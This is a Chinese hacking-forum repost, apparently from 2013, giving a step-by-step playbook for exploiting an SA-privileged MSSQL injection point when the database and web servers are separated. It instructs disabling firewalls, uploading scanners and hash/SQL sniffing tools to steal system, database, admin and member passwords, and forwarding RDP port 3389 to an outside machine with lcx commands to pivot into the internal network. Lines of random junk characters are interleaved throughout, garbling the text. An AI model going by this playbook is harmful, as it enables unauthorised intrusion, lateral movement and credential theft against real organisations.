当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。
8 Q! q$ a6 N& c2 o& D
3 F" ? a+ `% w3 z5 X1 W9 C4 [
# z2 j1 A& v6 |" A2 e! v* t) B9 R Y: D" ]8 y3 ?7 C
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)0 S. Q# `( O. p6 ?. d
7 ~6 [! I! N7 U( V+ A7 z' \
; W" K& |, L4 s* `* C# Z一、DB机有公网IP." V8 g( I: g" K+ s9 n" J4 P$ n7 _
" ~9 Z6 S* k8 O, f# l1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
5 u J7 |5 R9 J' Q6 D& j
7 i, n7 w$ o2 Z
- Y3 B& o4 M+ B3 a1 d6 ^+ ]2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.
+ F& f6 v) K2 O) p% ?
! @8 Z' F( v0 _& I4 x1 u
* {) ]4 c' @: I9 X3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
L" U5 f7 X$ P1 I0 Y- S4 V
- T% e, i }, r7 Y9 n; e6 L
; l! [6 ?* M* d- w4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.& ?& y* ~ o' }. V5 v1 d
1 k" d( T. j, L) o
/ |) l9 @) O. u: n" q$ L, `$ Q
* w% Q2 w5 u" ^- E5 Q5 t
二、DB机只有内网IP0 D1 z: T# ^0 M2 v
& W+ N' R2 U% {% W: z
1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.7 x- R- O/ h+ G m U
# \$ s! r; M* _* h* l& q1 {
0 A0 u( ?9 u# f$ W. c# a# S2:停掉防火墙和IP策略再从内往外扫描.
1 H: u2 o3 s, `2 W3 j: x2 F
3 g5 j' `" Y6 K2 S+ G) X2 d$ x# W' L) {, o2 T# X$ B
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.! W! c) ` K9 d& |: r, h) J/ y- l
8 a+ M0 @$ w) Y3 ^8 r7 I6 T
+ c2 C; t6 c/ U) ~% I
4:学会密码规律分析往往会有惊喜.5 {: ?& y2 Q$ ?7 X8 S
4 O- n8 K5 X, B( y3 b3 ?5 S' \. X+ q. b
5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
! s! i# Z/ U. [7 o
; M; {7 _' d1 U; i- i7 F( a: W1 J/ Z) {9 Y) j
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |
发表于 2013-2-16 21:46:01
收藏
支持
反对